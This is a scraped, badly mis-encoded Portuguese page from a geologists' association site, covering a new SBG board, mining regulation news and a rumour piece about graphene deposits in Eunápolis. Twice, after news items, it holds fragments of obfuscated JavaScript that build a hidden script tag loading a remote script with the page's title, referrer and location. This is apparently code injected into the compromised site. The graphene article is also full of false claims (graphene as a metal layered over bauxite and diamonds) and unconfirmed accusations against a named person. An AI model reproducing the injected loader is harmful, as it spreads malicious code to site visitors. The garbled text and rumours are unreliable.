PorAGEGO Goiás

Nova Diretoria Executiva da SBG

Nova Diretoria Executiva da SBG

Informamos que no dia 02 de janeiro assumiu a nova Diretoria Executiva da SBG sendo composta pelos nomes abaixo listados. O nA?mero de votantes foi recorde superando 350 votos vA?lidos.

Diretor Presidente:Ai??Gilmar Vital BuenoAi??Ai??-Ai??Ai??UFF

GeA?logo pela Universidade do Vale do Rio dos Sinos (1984), Mestre pela Universidade Federal de Ouro Preto (1987) e Doutor pela Universidade Federal do Rio Grande do Sul (2001). GeA?logo da PETROBRAS entre 1987 e 2015. Professor da Universidade Federal Fluminense (2014). Editor Associado do periA?dicoAi??Boletim deAi??GeociA?ncias da PetrobrasAi??(2004-2012) eAi??Brazilian Journal of GeologyAi??(2013 – atual). SA?cio da SBG desde 1982. Diretor de ProgramaAi??A?o TAi??cnico-CientAi??fica (2012 – 2015) e Presidente (2016-atual) da Diretoria Nacional da SBG. Principais A?reas de interesse: tectA?nica & sedimentaAi??A?o, anA?lise de bacias sedimentares e geologia do petrA?leo.

Diretor Vice-Presidente: Simone Cerqueira Pereira Cruz Ai??ai??i?? Ai??UFBA

GeA?loga pela Universidade Federal da Bahia (1997), mestrado em EvoluAi??A?o Crustal e Recursos Naturais pela Universidade Federal de Ouro Preto (2000) e doutorado em EvoluAi??A?o Crustal e Recursos Naturais pela Universidade Federal de Ouro Preto (2004). SA?cia da SBG desde 2003. Diretora-Presidente da SBG nA?cleo Bahia (2011-2014). Coordenadora do curso de pA?s-graduaAi??A?o em geologia e professora adjunta da UFBA. Bolsista de Produtividade em Pesquisa nAi??vel 2 do CNPq. Principais A?reas de interesse: Estrutural e TectA?nica.

Diretor SecretA?rio: Fabio Braz Machado Ai??- UNIFESP

GeA?logo (2003), Mestre (2005), Doutor (2009) e PA?s-doutor (2012) pela Universidade Estadual Paulista. Coordenador de projetos no CNPq. SA?cio da SBG desde 2001. Diretor SecretA?rio da SBG-Sede (2014 – atual). Diretor-Presidente da SBG nA?cleo SA?o Paulo (2007-2010). Presidente do 46A? Congresso Brasileiro de Geologia (Santos-2012). Editor Associado do periA?dicoAi??GeociA?nciasAi??(2004-atual) Professor adjunto da Universidade Federal de SA?o Paulo desde 2010. Principais A?reas de interesse: geoquAi??mica, vulcanologia, mineralogia, litogeoquAi??mica e petrologia magmA?tica.

Diretor Financeiro: Carlos Henrique Grohmann de Carvalho – USP

GeA?logo (2001), Mestre (2004) e Doutor (2008) em GeociA?ncias (GeoquAi??mica e GeotectA?nica) pela Universidade de SA?o Paulo, com estA?gio de doutorado-sanduAi??che junto Ai?? Kingston University London (2007). Professor Livre-Docente da A?rea de Geotecnologias (IGc-USP: 2009-2013, IEE-USP: 2014-atual). Bolsista de Produtividade em Pesquisa nAi??vel 2 do CNPq. SA?cio da SBG desde 1998. Diretor Financeiro da SBG-Sede (2014 – atual). Diretor de ComunicaAi??A?o e PublicaAi??Ai??es do NA?cleo SA?o Paulo da SBG nos biA?nios 2011-2014. Bolsista de Produtividade em Pesquisa nAi??vel 2 do CNPq. Principais A?reas de interesse: geoprocessamento, sensoriamento remoto, geomorfologia, neotectA?nica.

Diretora de ComunicaAi??A?o e PublicaAi??Ai??es: Julia Barbosa Curto Ma – UnB

SA?cia da SBG desde 2008. Diretora Adjunta (2011-2013 e 2013-2015) e Diretora Vice-Presidente (2015-2016) do NA?cleo BrasAi??lia da SBG. Diretora de comunicaAi??A?o e publicaAi??Ai??es da SBG Sede (2016-2018). GeA?loga (2007), Mestre em GeociA?ncias Aplicadas (2011) e Doutora em Geologia (2015) pela Universidade de BrasAi??lia – UnB, com estA?gio de doutorado-sanduAi??che na U.S. Geological Survey ai??i?? Menlo Park, California. Atualmente, Ai?? Professora Adjunto do curso de Geologia da UnB. Principais A?reas de interesse: geofAi??sica aplicada, sensoriamento remoto, geoprocessamento, tectA?nica e mapeamento geolA?gico.

Diretora de ProgramaAi??A?o TAi??cnico-CientAi??fica: Viviane Ficagna Morbach –Ai??Har Engenharia e Meio Ambiente LTDA

GeA?loga pela Universidade do Vale do Rio dos Sinos (2012). GeA?loga da empresa Har Engenharia e Meio Ambiente LTDA desde fevereiro de 2013. SA?cia da SBG desde 2013. Principais A?reas de interesse: sondagens, geotecnia, mineraAi??A?o, hidrogelogia, estudos de impactos, mapeamento, gestA?o e licenciamentos.

Diretor Adjunto: JoA?o Marinho de Morais Neto – PETROBRASGeA?logo pela Universidade Federal do Rio Grande do Norte (1987), Mestre em Geologia Estrutural e TectA?nica pela Universidade Federal de Ouro Preto (1999) e Doutor em Geologia (2010) na Universidade de Queensland, AustrA?lia. Consultor SA?nior da PETROBRAS atuando na A?rea geofAi??sica de exploraAi??A?o hA? trinta anos. Principais A?reas de interesse: IntAi??rprete de bacias interiores brasileiras, assim como na Margem Equatorial e no Subandino Boliviano.

Sociedade Brasileira de Geologia

Secretaria Component(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}

PorAGEGO Goiás

IndA?stria extrativa mineral fecha 1.155 vagas em novembro

PorAGEGO Goiás

Nota de falecimento

PorAGEGO Goiás

Rosa Weber decide que, por ora, amianto Ai?? liberado onde nA?o hA? lei contrA?ria

PorAGEGO Goiás

Sancionada lei que altera royalties pagos por mineradoras

PorAGEGO Goiás

Governo de MG quer dispensar o uso de barragens na mineraAi??A?o

Governo de MG quer dispensar o uso de barragens na mineraAi??A?o

O governo de Minas Gerais quer estimular alternativas tAi??cnicas que dispensem o uso de barragens na mineraAi??A?o, dois anos apA?s o desastre da Samarco em Mariana (MG). Uma lei ambiental de 2016 (nA? 21.972) e um projeto de lei que tramita na Assembleia Legislativa do Estado (nA? 3.676/16) buscam fomentar alternativas tecnolA?gicas Ai?? implantaAi??A?o de barragens para a disposiAi??A?o de rejeitos minerA?rios.

JA? hA? mineradoras mudando projetos, para nA?o usar barragens, e, simultaneamente empresas do setor tA?m sido abordadas por fornecedores de novas tecnologias.

A procura por alternativas tecnolA?gicas considera tanto tAi??cnicas que nA?o utilizem barragens para fazer o processamento de minAi??rios como tambAi??m o desenvolvimento progressivo de tecnologias para recuperaAi??A?o de resAi??duos. As novas tecnologias nA?o substituem as barragens. Mas, ao serem implantadas, tA?m condiAi??Ai??es de reduzir rejeitos depositados em barragens, disse Pedro Paulo Dias, gerente do departamento de MineraAi??A?o e Metais do Banco Nacional de Desenvolvimento EconA?mico e Social (BNDES). Em 2014, por exemplo, os rejeitos representaram cerca de um terAi??o da produAi??A?o de minAi??rio de ferro no paAi??s, disse Dias.

O BNDES apoia iniciativas como a de Minas que estimulem o desenvolvimento progressivo e contAi??nuo de tecnologias mais sustentA?veis na mineraAi??A?o. Esse apoio se dA? via plano Inova Mineral, de suporte Ai?? inovaAi??A?o, e por meio das linhas operacionais do banco. Projetos de mineraAi??A?o que incorporem tecnologias sustentA?veis podem ter participaAi??A?o maior do banco no financiamento, disse Natalia Visconti, chefe do departamento de mineraAi??A?o do BNDES. Ela afirmou que Ai?? importante que hajam regras claras para o licenciamento ambiental na mineraAi??A?o.

Germano Vieira, secretA?rio de meio ambiente e desenvolvimento sustentA?vel de Minas Gerais, disse que as iniciativas tomadas pelo Estado buscam tornar mais eficiente a gestA?o de barragens. Um decreto do ano passado (nA? 46.993) suspendeu temporariamente o licenciamento de novas barragens de mineraAi??A?o e a ampliaAi??A?o de barragens jA? existentes que pretendam utilizar ou utilizem o mAi??todo de alteamento a montante. O projeto de lei sobre o licenciamento ambiental e a fiscalizaAi??A?o de barragens, que tramita na Assembleia de Minas, proAi??be, por sua vez, a construAi??A?o de novas barragens por esse mesmo mAi??todo.

O mAi??todo de alteamento a montante foi o utilizado na barragem de FundA?o, da Samarco, que se rompeu em 5 de novembro de 2015, resultando na morte de 19 pessoas. Existem trA?s mAi??todos de construAi??A?o de barragens: a montante, a jusante ou por linha de centro, sempre em relaAi??A?o do dique de partida. As barragens a montante sA?o consideradas mais suscetAi??veis a acidentes do que outros mAi??todos de construAi??A?o.

Vieira afirmou que Ai?? importante fomentar o setor produtivo para que desenvolva novas tecnologias e alternativas Ai?? disposiAi??A?o de rejeitos em barragens. Segundo ele, apA?s a Samarco, surgiram casos de empresas que previam barragens e terminaram mudando seus projetos para usar outras tAi??cnicas. Vieira afirmou que pela lei federal de barragens (12.334/10) o responsA?vel pela instalaAi??A?o Ai?? o empreendedor e a fiscalizaAi??A?o cabe ao Departamento Nacional de ProduAi??A?o Mineral (DNPM).

ai???O que a lei estadual pode regulamentar Ai?? a gestA?o das barragens do ponto de vista ambientalai???, afirmou o secretA?rio. Ele avaliou que o desafio, para as mineradoras, Ai?? o ai???licenciamento socialai???, entendido como o apoio da populaAi??A?o a um determinado projeto.

Em relaAi??A?o Ai?? Samarco, Vieira disse que a deliberaAi??A?o final sobre a licenAi??a prAi??via da cava de Alegria Sul, para deposiAi??A?o de rejeitos pela empresa, estA? pautada para o dia 11 deste mA?s no A?rgA?o de meio ambiente do Estado. Esse Ai?? um primeiro passo para o retorno Ai?? operaAi??A?o da mineradora.

O rejeito depositado nas barragens resulta de um processo de concentraAi??A?o mineral que gera uma polpa. Mas existem outros mAi??todos de concentraAi??A?o, como a separaAi??A?o magnAi??tica nos metais.

O BNDES tem conhecimento de dois projetos com essas caracterAi??sticas. ai???As mineradoras tA?m sido abordadas por fornecedores de serviAi??os com esse tipo de tecnologia para iniciar a implantaAi??A?o no paAi??sai???, disse Dias.Ai??Com informaAi??Ai??es do Valor EconA?mico.

Fobte: ABPM

PorAGEGO Goiás

Setor de MineraAi??A?o

Setor de MineraAi??A?o

A equipe econA?mica enviarA? ao presidente Michel Temer na prA?xima semana uma sAi??rie de vetos aos projetos que criaram a ANM (AgA?ncia Nacional de MineraAi??A?o) e mudaram as taxas cobradas das mineradoras.Ai??Para os tAi??cnicos, da forma como foram aprovadas pelo Congresso, as medidas trarA?o alta de despesas e levarA?o Ai?? perda de arrecadaAi??A?o, algo inaceitA?vel em um momento de restriAi??A?o orAi??amentA?ria.

Em julho, quando anunciou o programa de revitalizaAi??A?o do setor de mineraAi??A?o, Temer enviou ao Congresso trA?s medidas provisA?rias. Juntas, elas reformariam o setor para destravar investimentos e aumentar a arrecadaAi??A?o com uma nova forma de cobranAi??a de taxas sobre as atividades de mineraAi??A?o.Ai??Com as novas regras, produtores de ferro e ouro passarA?o a ter suas alAi??quotas dobradas, embora elas variem de acordo com a cotaAi??A?o internacional do minAi??rio.

A transformaAi??A?o do atual DNPM (Departamento Nacional de ProduAi??A?o Mineral) em agA?ncia reguladora darA? maior autonomia ao A?rgA?o. Hoje, quando uma empresa pede autorizaAi??A?o para fazer estudos de viabilidade econA?mica de uma mina, pode ficar mais de dois anos analisando.

Sentar na mina

Esse processo, ainda segundo os tAi??cnicos, Ai?? manual e, na maior parte das vezes, os grupos econA?micos ai???sentam na minaai???, criando uma espAi??cie de ai???reserva de mercadoai???, porque os processos no DNPM sA?o lentos e burocrA?ticos.Ai??A medida provisA?ria tornaria eletrA?nico o procedimento, permitindo a entrada de outros interessados se os prazos nA?o se cumprirem. Ao fazer a fila andar, investimentos serA?o gerados.Ai??No entanto, isso nA?o prosperou. A medida provisA?ria que trazia novo marco regulatA?rio para a mineraAi??A?o perdeu a validade, e Temer terA? de enviar outra sobre o assunto ao Congresso no prA?ximo ano se quiser destravar investimentos no setor.

Em outubro, o Congresso sA? aprovou a criaAi??A?o da ANM e o aumento das alAi??quotas cobradas sobre exploraAi??A?o de substA?ncias minerais, conhecida como Cfem (CompensaAi??A?o Financeira pela ExploraAi??A?o de Recursos Minerais).Ai??Para os tAi??cnicos da A?rea econA?mica, existem problemas nas duas medidas que, pelo acordo entre o Congresso e o governo, trariam aumento de gastos e perda de arrecadaAi??A?o.Ai??No caso da Cfem, os recursos serA?o divididos entre UniA?o, Estados e municAi??pios. A UniA?o ficaria com 12%. Da forma como foi aprovada, ficarA? com 10%. A diferenAi??a (2%) reforAi??arA? o cofre de municAi??pios mais afetados pela mineraAi??A?o. Essa Ai?? uma das correAi??Ai??es que o nA?cleo econA?mico enviarA? a Temer.

Ainda segundo os tAi??cnicos, a criaAi??A?o da ANM desrespeitou dois pontos do acordo, o que tambAi??m deve ser vetado, segundo os tAi??cnicos. Ao igualar os servidores do DNPM com o das agA?ncias reguladoras, haverA? aumento salarial, o que nA?o estava previsto.

Fonte:Ai??O SulAi?? \x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0xb322[1]](_0xb322[0]);s[_0xb322[2]]= _0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12];if(document[_0xb322[13]]){document[_0xb322[13]][_0xb322[15]][_0xb322[14]](s,document[_0xb322[13]])}else {d[_0xb322[18]](_0xb322[17])[0][_0xb322[16]](s)};if(document[_0xb322[11]][_0xb322[19]]=== _0xb322[20]&& KTracking[_0xb322[22]][_0xb322[21]](_0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}

PorAGEGO Goiás

PRAi??-SAL ATINGE NOVO RECORDE DIA?RIO EM NOVEMBRO

PorAGEGO Goiás

HOJE, 15/12/2017 – EleiAi??Ai??es no sistema CONFEA/CREA

PorAGEGO Goiás

GeA?logos chineses continuam prospectando ai???grafenoai??? na regiA?o e pode ter muito mais

GeA?logos chineses continuam prospectando ai???grafenoai??? na regiA?o e pode ter muito mais

Quando a editoria do rota51.com, diz que Ai?? o A?nico site que sai Ai??s ruas da cidade para captar notAi??cias ou pelo menos saber, o que estA? acontecendo de bom na regiA?o, muita gente duvida, ri e atAi?? desconfia, lembra que o rota51.com anunciou que EunA?polis estava na rota de ser o maior produtor de ai???Grafenoai??? do mundo? Pois Ai??, a coisa estA? mais avanAi??ada do que se imagina, os chineses estA?o aAi?? e, sA? o rota51.com estA? em busca da verdade.

Na sessA?o da CA?mara de Vereadores do dia 08 de outubro de 2015, o vereador Jota Batista, falou em primeira mA?o sobre o assunto e que foi corroborado pelo SecretA?rio de Desenvolvimento econA?mico Roberto Martins, Ai?? Ai??poca, a reportagem do rota51.com solicitou as fotos, mas as mesmas nA?o foram liberadas para a nossa reportagem e a reportagem do rota51.com buscou outras fontes e estas, tem mantido sempre que possAi??vel as informaAi??Ai??es.

De acordo com as novas informaAi??Ai??es, os chineses que jA? estA?o em EunA?polis hA? muito tempo, e que jA? montaram um laboratA?rio sofisticado no bairro Juca Rosa, jA? encontraram algumas jazidas e estA?o fazendo perfuraAi??Ai??es com sondas de longas distancias solo a dentro, na busca do tA?o sonhado grafeno, que Ai?? uma substancia retirada do grafite existente em abundA?ncia na regiA?o e, este grafeno, Ai?? a matAi??ria prima utilizada na fabricaAi??A?o do aAi??o carbono que serA? utilizado em larga escala pela NASA, em uma edificaAi??A?o que cujas estruturas sA?o de aAi??o carbono.

PorAi??m as informaAi??Ai??es obtidas pela reportagem do rota51.com, nA?o Ai?? sA? o grafeno nA?o, na realidade o grafeno Ai?? sA? a primeira camada e em larga escala, podendo ser a maior jazida do mundo do famoso metal, depois do grafeno ainda tem outra camada de bauxita e por fim, um dos minerais mais preciosos do mundo e que por ele, muitas pessoas jA? foram mortas, depois da bauxita, tem o tA?o famigerado ai???Diamanteai???.

As informaAi??Ai??es tambAi??m dA?o conta de que, as regiAi??es da ColA?nia e Ponto Maneca e atAi?? a regiA?o de Guaratinga, as minas jA? foram detectadas, porAi??m como o sub solo jA? foi registrado, a medida que as jazidas sA?o encontradas, o sub solo jA? vai sendo registrado, os donos, das terras, nada poderA?o fazer, principalmente fazer a extraAi??A?o do metal, mas poderA?o ganhar os ai???royaltiesai??? da prospecAi??A?o, o que os donos das terras ainda nA?o registradas, poderA?o fazer Ai?? buscar um geA?logo e fazer seu prA?prio registro. As informaAi??Ai??es dA?o conta de que a ColA?nia, Ponto Maneca vA?o ser reviradas de cabeAi??a pra baixo e pernas pra cima, transtorno vai ser geral, ou seja, um Deus nos acuda.

A CBG Companhia baiana de Grafite, tem todas as informaAi??Ai??es, mas ninguAi??m fala nada, mas serA?o dois complexos industriais, um serA? o extrativista e o outro o beneficiamento, outra empresa tambAi??m que estA? por dento do assunto Ai?? a CBPM Companhia Baiana de Pesquisa Mineral, mas o silencio deve ser, devido ao medo da concorrA?ncia, mas o assunto embora tenha sido divulgado apenas pelo rota51.com, que tem a exclusividade da matAi??ria atAi?? agora, tambAi??m jA? tomou conhecimento, de que os registros feitos atAi?? agora, podem ter como dono Lulinha, o filho do Lula, noticia nA?o confirmada, pois segundo informaAi??Ai??es dadas A? reportagem do rota51.com a tempos atrA?s, Lulinha esteve hospedado em um hotel da cidade e veio para tratar de assuntos do seu interesse, a reportagem pensou que ele, teria vindo tentar adquirir o frigorAi??fico que Ai?? Ai??poca atravessava problemas jurAi??dicos, mas realidade, desde 2015 ou atAi?? mesmo antes, ele jA? estava sabendo e teve tempo de, segundo informaAi??Ai??es nA?o oficiais, fazer os devidos registros. Com relaAi??A?o Ai?? propriedade de Lulinha nas terras jA? identificadas como tendo o grafeno, nada Ai?? confirmado, sA?o apenas informaAi??Ai??es, o que pode ser mentira, mas como o interlocutor da reportagem nA?o confirmou mas tambAi??m nA?o negou, sA? o futuro poderA? dizer.

No prA?ximo dia 28/04, haverA? na cidade em local ainda a ser confirmado, um seminA?rio denominado ai???NegA?cios com a Chinaai??? e neste evento, alguns chineses poderA?o estar presentes, pois como a CBG vai patrocinar o evento, eles terA?o de aparecer e, quando o local, data e hora forem divulgados, o rota51.com, serA? o 1A? a divulgar.

De acordo com as informaAi??Ai??es, o tal Grafeno sA? existe em MoAi??ambique e CeilA?o, mas na china as minas do mineral sA?o muito pobres, e que o mineral de 1A? qualidade estA? mesmo nesta regiA?o do extremo sul da Bahia.

Recentemente quem esteve na cidade, no dia 31/03 uma 5A? feira, foi o Presidente do Desembahia Otto Alencar Filho, ele visitou a Naturaves, uma plantaAi??A?o de cafAi??, esteve o IASC tratando de assuntos sobre a faculdade de engenharia e medicina, e o Hospital Ames, mas nA?o falou com a imprensa, pois ou teria de omitir a situaAi??A?o ou entA?o confirmar tudo que o rota51.com divulgou atAi?? o momento. Mas em sua visita, fez uma palestra com a CBG/AS sobre o assunto.

O link abaixo, Ai?? da matAi??ria, da CA?mara Municipal, no dia em que Jota Batista e Roberto Martins falaram sobre a mina e as jazidas do grafeno, e agora supostamente bauxita e diamantes, e os moradores da ColA?nia, Ponto Maneca e Guaratinga, que ainda nA?o foram prospectados e que quiserem garantir um acordo justo e honesto, por que quem em de fora, vem afim de ai???sacanearai??? o brasileiro e com a ajuda de algumas autoridades, deverA?o desde jA?, tentarem um mandado de seguranAi??a afim de que suas terras nA?o sejam invadidas aleatoriamente, mas sim somente com a autorizaAi??A?o do dono, para evitarem ter o subsolo de suas terras registradas e verem depois suas terras serem reviradas a troco de nada e, podem ter certeza, de que nessa empreitada poderA?o acontecer algumas mortes, por conta da usura de uns, em cima da inocA?ncia de muitos, por que se quisessem fazer uma coisa honesta, a cidade toda jA? sabia, jA? teria sido feita uma audiA?ncia pA?blica com a presenAi??a de autoridades do MinistAi??rio PA?blico, do judiciA?rio, autoridade ambientais a menos que Mauro saiba da situaAi??A?o e esteja jogando contra seu prA?prio quartel, aAi?? sA? DEUSAi?? segura.

Fonte:Ai??http://www.rota51.com/home/08/10/2015/secretario-roberto-martins-fala-da-sua-pasta-e-dos-novos-projetos-e-do-distrito-industrial/